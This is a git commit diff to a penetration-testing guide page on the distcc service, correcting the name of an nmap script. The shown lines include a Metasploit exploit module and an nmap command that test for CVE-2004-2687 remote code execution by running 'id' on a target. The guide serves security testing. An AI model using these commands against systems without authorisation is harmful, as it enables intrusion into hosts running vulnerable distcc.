Update 3632-pentesting-distcc.md

Correction of the script name
This commit is contained in:
Sergio C 2024-03-02 00:18:09 +01:00 committed by GitHub
parent 7ae219aa33
commit c45f02d0a4
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -32,7 +32,7 @@ Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan